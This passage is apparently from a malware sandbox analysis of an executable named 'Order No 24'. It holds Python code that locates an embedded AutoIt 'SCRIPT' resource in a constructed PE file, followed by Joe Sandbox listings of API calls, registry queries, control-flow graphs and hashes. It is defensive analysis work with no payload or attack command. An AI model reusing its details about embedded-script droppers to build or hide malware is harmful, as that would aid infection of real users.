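    RT_RCDATA "SCRIPT" (lang 0). Offsets are laid out by hand."""
    off_root, off_icon_name, off_icon_lang, off_rc_name, off_rc_lang = 0, 32, 56, 80, 104
    off_str, off_data_icon, off_data_rc, off_blob = 128, 144, 160, 176
    out = bytearray(off_blob)

    def put_dir(off, entries):
        named = sum(1 for n, _ in entries if n & SUBDIR)
        struct.pack_into(DIR_FMT, out, off, 0, 0, 0, 0, named, len(entries) - named)
        for i, (n, d) in enumerate(entries):
            struct.pack_into("<II", out, off + 16 + 8 * i, n, d)

    put_dir(off_root, [(RT_ICON, SUBDIR | off_icon_name), (RT_RCDATA, SUBDIR | off_rc_name)])
    put_dir(off_icon_name, [(1, SUBDIR | off_icon_lang)])
    put_dir(off_icon_lang, [(0x409, off_data_icon)])
    put_dir(off_rc_name, [(SUBDIR | off_str, SUBDIR | off_rc_lang)])
    put_dir(off_rc_lang, [(0, off_data_rc)])
    name = "SCRIPT".encode("utf-16-le")
    struct.pack_into("<H", out, off_str, len("SCRIPT"))
    out[off_str + 2:off_str + 2 + len(name)] = name
    struct.pack_into("<IIII", out, off_data_icon, rsrc_rva + off_blob, len(icon_bytes), 0, 0)
    struct.pack_into("<IIII", out, off_data_rc, rsrc_rva + off_blob + len(icon_bytes), len(script_bytes), 0, 0)
    return bytes(out + icon_bytes + script_bytes)


# Constructed sample data (assumption: .rsrc mapped at RVA 0x3000).
SAMPLE_RVA = 0x3000
SAMPLE_ICON = b"\x00\x00\x01\x00" + b"\x00" * 12     # placeholder, not a real icon
SAMPLE_SCRIPT = b"constructed stand-in for the compiled script blob"
SAMPLE_RSRC = build_sample_rsrc(SAMPLE_RVA, SAMPLE_ICON, SAMPLE_SCRIPT)

if __name__ == "__main__":
    blob = find_resource(SAMPLE_RSRC, SAMPLE_RVA, RT_RCDATA, "SCRIPT")
    print("SCRIPT/RT_RCDATA present:", blob is not None, "size:", len(blob or b""))
```

To apply this to a real file, read the .rsrc section's raw bytes and its VirtualAddress from the section table and pass them as `rsrc` and `rsrc_rva`; the data-entry RVAs inside the tree are resolved relative to that value, which is why the function needs both. A missing SCRIPT entry returns None, mirroring the failure branch the graph takes when FindResourceExW, LoadResource, SizeofResource or LockResource returns zero.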
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,009F2F49), ref: 009C6CB9
                                                                                                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 009C6CCA
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 009C6CDA
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 48322524-0
                                                                                                                                  • Opcode ID: d0ce5754ba64837a593b57bda6ded81986b4d5dddd0d6a068782368dea5d4b34
                                                                                                                                  • Instruction ID: 0fc9a51198656abdd5c447e36c9af889ebc1a57deb83fa0739a7663af89a0024
                                                                                                                                  • Opcode Fuzzy Hash: d0ce5754ba64837a593b57bda6ded81986b4d5dddd0d6a068782368dea5d4b34
                                                                                                                                  • Instruction Fuzzy Hash: 33E0D832C1041457C210A7B8EC0D8EA376CDE05339F100709F5F1C11D0EB74D91145D6
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 3728558374-2766056989
                                                                                                                                  • Opcode ID: 0a3113f26251b8924b6af9add4b2b0d2ffaa8a237099910e6d9c0c3481df7eea
                                                                                                                                  • Instruction ID: 948a8944ae3178231f5524ae66a2d434c057bc8949bfe702cc80ced60a3345ee
                                                                                                                                  • Opcode Fuzzy Hash: 0a3113f26251b8924b6af9add4b2b0d2ffaa8a237099910e6d9c0c3481df7eea
                                                                                                                                  • Instruction Fuzzy Hash: 4F72BE74E04209AFDF14DF98C481BBEB7B9EF88300F14C45AE919AB291D735AE45CB91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3964851224-0
                                                                                                                                  • Opcode ID: 16b5e7e65ea895af6f3006f911ba63e869b256b72e5bb24982242153a30276ec
                                                                                                                                  • Instruction ID: 6af0c41b3411ad2064277d26fd32f1709f1bd40136946d4a4d522bb99d4e2bc9
                                                                                                                                  • Opcode Fuzzy Hash: 16b5e7e65ea895af6f3006f911ba63e869b256b72e5bb24982242153a30276ec
                                                                                                                                  • Instruction Fuzzy Hash: 4A9269706083419FDB24DF18C484B6ABBE5BF88308F14885DF99A8B3A2D775ED45CB52
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0098E959
• timeGetTime.WINMM ref: 0098EBFA
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0098ED2E
• TranslateMessage.USER32(?), ref: 0098ED3F
• DispatchMessageW.USER32(?), ref: 0098ED4A
• LockWindowUpdate.USER32(00000000), ref: 0098ED79
• DestroyWindow.USER32 ref: 0098ED85
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0098ED9F
• Sleep.KERNEL32(0000000A), ref: 009F5270
• TranslateMessage.USER32(?), ref: 009F59F7
• DispatchMessageW.USER32(?), ref: 009F5A05
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009F5A19
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
• String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
• API String ID: 2641332412-570651680
• Opcode ID: cdce3b84ab78258c08bcca7f3442b5e5d5265471ed0a8fe5f98d02cbbec335e0
• Instruction ID: ddbcdbccd4d9a57dcbd36e3f816cd8fd13babe584cfeecd3360aa48b91130e27
• Opcode Fuzzy Hash: cdce3b84ab78258c08bcca7f3442b5e5d5265471ed0a8fe5f98d02cbbec335e0
• Instruction Fuzzy Hash: 4562E270508344DFDB24EF64C895BAA77E8BF84304F04496DFA8A8B392DB75D849CB52
APIs
• ___createFile.LIBCMT ref: 009B5EC3
• ___createFile.LIBCMT ref: 009B5F04
• GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 009B5F2D
• __dosmaperr.LIBCMT ref: 009B5F34
• GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 009B5F47
• GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 009B5F6A
• __dosmaperr.LIBCMT ref: 009B5F73
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 009B5F7C
• __set_osfhnd.LIBCMT ref: 009B5FAC
• __lseeki64_nolock.LIBCMT ref: 009B6016
• __close_nolock.LIBCMT ref: 009B603C
• __chsize_nolock.LIBCMT ref: 009B606C
• __lseeki64_nolock.LIBCMT ref: 009B607E
• __lseeki64_nolock.LIBCMT ref: 009B6176
• __lseeki64_nolock.LIBCMT ref: 009B618B
• __close_nolock.LIBCMT ref: 009B61EB
  • Part of subcall function 009AEA9C: CloseHandle.KERNELBASE(00000000,00A2EEF4,00000000,?,009B6041,00A2EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 009AEAEC
  • Part of subcall function 009AEA9C: GetLastError.KERNEL32(?,009B6041,00A2EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 009AEAF6
  • Part of subcall function 009AEA9C: __free_osfhnd.LIBCMT ref: 009AEB03
  • Part of subcall function 009AEA9C: __dosmaperr.LIBCMT ref: 009AEB25
  • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
• __lseeki64_nolock.LIBCMT ref: 009B620D
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 009B6342
• ___createFile.LIBCMT ref: 009B6361
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 009B636E
• __dosmaperr.LIBCMT ref: 009B6375
• __free_osfhnd.LIBCMT ref: 009B6395
• __invoke_watson.LIBCMT ref: 009B63C3
• __wsopen_helper.LIBCMT ref: 009B63DD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
• String ID: @
• API String ID: 3896587723-2766056989
• Opcode ID: c8be0323bad5e0f2d944b27f0abee1f2f893e24a0bb5c8a67abd077f33241adf
• Instruction ID: f30e348cdd8ce608957533b3f117343ea6dde93db703560728912c43a01fb4df
• Opcode Fuzzy Hash: c8be0323bad5e0f2d944b27f0abee1f2f893e24a0bb5c8a67abd077f33241adf
• Instruction Fuzzy Hash: 092245719046099BEF299FA8DE45BFD7B75EB81330F294228E521DB2D2C3399D40CB91
APIs
• _wcscpy.LIBCMT ref: 009CFA96
• _wcschr.LIBCMT ref: 009CFAA4
• _wcscpy.LIBCMT ref: 009CFABB
• _wcscat.LIBCMT ref: 009CFACA
• _wcscat.LIBCMT ref: 009CFAE8
• _wcscpy.LIBCMT ref: 009CFB09
• __wsplitpath.LIBCMT ref: 009CFBE6
• _wcscpy.LIBCMT ref: 009CFC0B
• _wcscpy.LIBCMT ref: 009CFC1D
• _wcscpy.LIBCMT ref: 009CFC32
• _wcscat.LIBCMT ref: 009CFC47
• _wcscat.LIBCMT ref: 009CFC59
• _wcscat.LIBCMT ref: 009CFC6E
  • Part of subcall function 009CBFA4: _wcscmp.LIBCMT ref: 009CC03E
  • Part of subcall function 009CBFA4: __wsplitpath.LIBCMT ref: 009CC083
  • Part of subcall function 009CBFA4: _wcscpy.LIBCMT ref: 009CC096
  • Part of subcall function 009CBFA4: _wcscat.LIBCMT ref: 009CC0A9
  • Part of subcall function 009CBFA4: __wsplitpath.LIBCMT ref: 009CC0CE
  • Part of subcall function 009CBFA4: _wcscat.LIBCMT ref: 009CC0E4
  • Part of subcall function 009CBFA4: _wcscat.LIBCMT ref: 009CC0F7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
• String ID: >>>AUTOIT SCRIPT<<<
• API String ID: 2955681530-2806939583
• Opcode ID: 969787d3fbd415c1000169537b15406ac15b6cc227cb0504f44bc35888e2d830
• Instruction ID: 30ffc2ad4dddda102de060fee24056e28e7111c151633335222ab6f32647a253
• Opcode Fuzzy Hash: 969787d3fbd415c1000169537b15406ac15b6cc227cb0504f44bc35888e2d830
• Instruction Fuzzy Hash: E191A172504705AFDB24EB54C851F9BB3E9BFD8310F04886DF99997292DB30EA44CB92
APIs
  • Part of subcall function 009CBDB4: __time64.LIBCMT ref: 009CBDBE
  • Part of subcall function 00984517: _fseek.LIBCMT ref: 0098452F
• __wsplitpath.LIBCMT ref: 009CC083
  • Part of subcall function 009A1DFC: __wsplitpath_helper.LIBCMT ref: 009A1E3C
• _wcscpy.LIBCMT ref: 009CC096
• _wcscat.LIBCMT ref: 009CC0A9
• __wsplitpath.LIBCMT ref: 009CC0CE
• _wcscat.LIBCMT ref: 009CC0E4
• _wcscat.LIBCMT ref: 009CC0F7
• _wcscmp.LIBCMT ref: 009CC03E
  • Part of subcall function 009CC56D: _wcscmp.LIBCMT ref: 009CC65D
  • Part of subcall function 009CC56D: _wcscmp.LIBCMT ref: 009CC670
• DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009CC2A1
• DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009CC338
• CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009CC34E
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009CC35F
• DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009CC371
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                                  • String ID: p1#v`K$v
                                                                                                                                  • API String ID: 2378138488-1068180069
                                                                                                                                  • Opcode ID: 45e8ed4d0349bfcdf08e568b16878a597cec676798bb510da27e1192e165f3d6
                                                                                                                                  • Instruction ID: 56ce620847d8923a2e897ce4099b4554a9f4ffc8135927bcc88b3587c0448632
                                                                                                                                  • Opcode Fuzzy Hash: 45e8ed4d0349bfcdf08e568b16878a597cec676798bb510da27e1192e165f3d6
                                                                                                                                  • Instruction Fuzzy Hash: F2C10CB1E00219ABDF11DFA5DC81FDEBBBDAF89310F0040AAF609E6151DB719A448F61

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00983F86
• RegisterClassExW.USER32(00000030), ref: 00983FB0
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00983FC1
• InitCommonControlsEx.COMCTL32(?), ref: 00983FDE
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00983FEE
• LoadIconW.USER32(000000A9), ref: 00984004
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00984013
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: cc3e46f20cdb868e5a4c0b138661f102123499bea2259dc99c636f87bf8230ee
• Instruction ID: d009801ffee1aff6c344b19ddf33f75c3767d9f04e123eb7b059e843c3188095
• Opcode Fuzzy Hash: cc3e46f20cdb868e5a4c0b138661f102123499bea2259dc99c636f87bf8230ee
• Instruction Fuzzy Hash: 6C21C7B9900318AFDB10DFE4E889BCDBBB4FB49700F01461AF615A62A0D7B545868F91

Control-flow Graph

APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 009837B3
• KillTimer.USER32(?,00000001), ref: 009837DD
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00983800
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0098380B
• CreatePopupMenu.USER32 ref: 0098381F
• PostQuitMessage.USER32(00000000), ref: 0098382E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated
• API String ID: 129472671-2362178303
• Opcode ID: e61d61dd9c9224bfc050e32522eae84235285d2764e6f81a464391068b372491
• Instruction ID: 4b21c289fb60767d3d8893e6c6a78609f198a5921c8b2e04e643a71ef0b5d33c
• Opcode Fuzzy Hash: e61d61dd9c9224bfc050e32522eae84235285d2764e6f81a464391068b372491
• Instruction Fuzzy Hash: 0F415DFA114249E7DB14FFA8EC4AF793A59F7C1B00F008515F602D2391DB69DD928761

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00983E79
• LoadCursorW.USER32(00000000,00007F00), ref: 00983E88
• LoadIconW.USER32(00000063), ref: 00983E9E
• LoadIconW.USER32(000000A4), ref: 00983EB0
• LoadIconW.USER32(000000A2), ref: 00983EC2
  • Part of subcall function 00984024: LoadImageW.USER32(00980000,00000063,00000001,00000010,00000010,00000000), ref: 00984048
• RegisterClassExW.USER32(?), ref: 00983F30
  • Part of subcall function 00983F53: GetSysColorBrush.USER32(0000000F), ref: 00983F86
  • Part of subcall function 00983F53: RegisterClassExW.USER32(00000030), ref: 00983FB0
  • Part of subcall function 00983F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00983FC1
  • Part of subcall function 00983F53: InitCommonControlsEx.COMCTL32(?), ref: 00983FDE
  • Part of subcall function 00983F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00983FEE
  • Part of subcall function 00983F53: LoadIconW.USER32(000000A9), ref: 00984004
  • Part of subcall function 00983F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00984013
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: 306d77f3c4f63f9a79fa9942dcc86dc95fc683063c25ea94d3003fe5768b4fc3
• Instruction ID: c080fcea4ea142401e108d48a281108b9a4dda69074a979e8366a674d99d49d2
• Opcode Fuzzy Hash: 306d77f3c4f63f9a79fa9942dcc86dc95fc683063c25ea94d3003fe5768b4fc3
• Instruction Fuzzy Hash: C5212FB9D00314ABDB10DFE9EC45A99BBF5EB89710F00421AE214A72A0D77646868B91

Control-flow Graph

APIs
• __lock.LIBCMT ref: 009AACC1
  • Part of subcall function 009A7CF4: __mtinitlocknum.LIBCMT ref: 009A7D06
  • Part of subcall function 009A7CF4: EnterCriticalSection.KERNEL32(00000000,?,009A7ADD,0000000D), ref: 009A7D1F
• __calloc_crt.LIBCMT ref: 009AACD2
  • Part of subcall function 009A6986: __calloc_impl.LIBCMT ref: 009A6995
  • Part of subcall function 009A6986: Sleep.KERNEL32(00000000,000003BC,0099F507,?,0000000E), ref: 009A69AC
• @_EH4_CallFilterFunc@8.LIBCMT ref: 009AACED
• GetStartupInfoW.KERNEL32(?,00A36E28,00000064,009A5E91,00A36C70,00000014), ref: 009AAD46
• __calloc_crt.LIBCMT ref: 009AAD91
• GetFileType.KERNEL32(00000001), ref: 009AADD8
• InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 009AAE11
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
• String ID:
• API String ID: 1426640281-0
• Opcode ID: d3bf4c019a5a473618bb9d5f35618e1b97fc465263ca299e7b6eef1942c944f3
• Instruction ID: 54d852187717effe293a615b23a00fc96e049628d473e699149c8ee008482c28
• Opcode Fuzzy Hash: d3bf4c019a5a473618bb9d5f35618e1b97fc465263ca299e7b6eef1942c944f3
• Instruction Fuzzy Hash: 0A81F3719053458FDB24CFA8C8806ADBBF4AF4B320B24465DE4A6AB3D1D7359803CBD6

Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01274021
                                                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01274247
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141637301.0000000001271000.00000040.00000020.00020000.00000000.sdmp, Offset: 01271000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1271000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFileFreeVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 204039940-0
                                                                                                                                  • Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                                                                                                  • Instruction ID: 522b950658c84f0687b0640bbd5ec7f154173d506c0450b9a8a5fa009f119b49
                                                                                                                                  • Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                                                                                                  • Instruction Fuzzy Hash: 2BA12974E10249EBDB14EFA4D895BEEBBB5FF48304F208159E611BB280D7759A40CF54

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 1196 9849fb-984a25 call 98bcce RegOpenKeyExW 1199 9f41cc-9f41e3 RegQueryValueExW 1196->1199 1200 984a2b-984a2f 1196->1200 1201 9f4246-9f424f RegCloseKey 1199->1201 1202 9f41e5-9f4222 call 99f4ea call 9847b7 RegQueryValueExW 1199->1202 1207 9f423d-9f4245 call 9847e2 1202->1207 1208 9f4224-9f423b call 986a63 1202->1208 1207->1201 1208->1207
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00984A1D
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009F41DB
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009F421A
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 009F4249
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                  • API String ID: 1586453840-614718249
                                                                                                                                  • Opcode ID: b8ba8cdc806586f97cf86a5245bd9a3cf666383a1871e7c8b7c103bef1cb38fd
                                                                                                                                  • Instruction ID: 61d06400a1691c3ad018b7c5cb2e0d9a12fded8466abb24be5b610ff62577ffb
                                                                                                                                  • Opcode Fuzzy Hash: b8ba8cdc806586f97cf86a5245bd9a3cf666383a1871e7c8b7c103bef1cb38fd
                                                                                                                                  • Instruction Fuzzy Hash: 14112C71A0010DBEEB04EFE4CD86EFF7BACEF14354F104465B506D6291EA709E429B50

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 1223 9836b8-983728 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009836E6
                                                                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00983707
                                                                                                                                  • ShowWindow.USER32(00000000,?,?,?,?,00983AA3,?), ref: 0098371B
                                                                                                                                  • ShowWindow.USER32(00000000,?,?,?,?,00983AA3,?), ref: 00983724
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
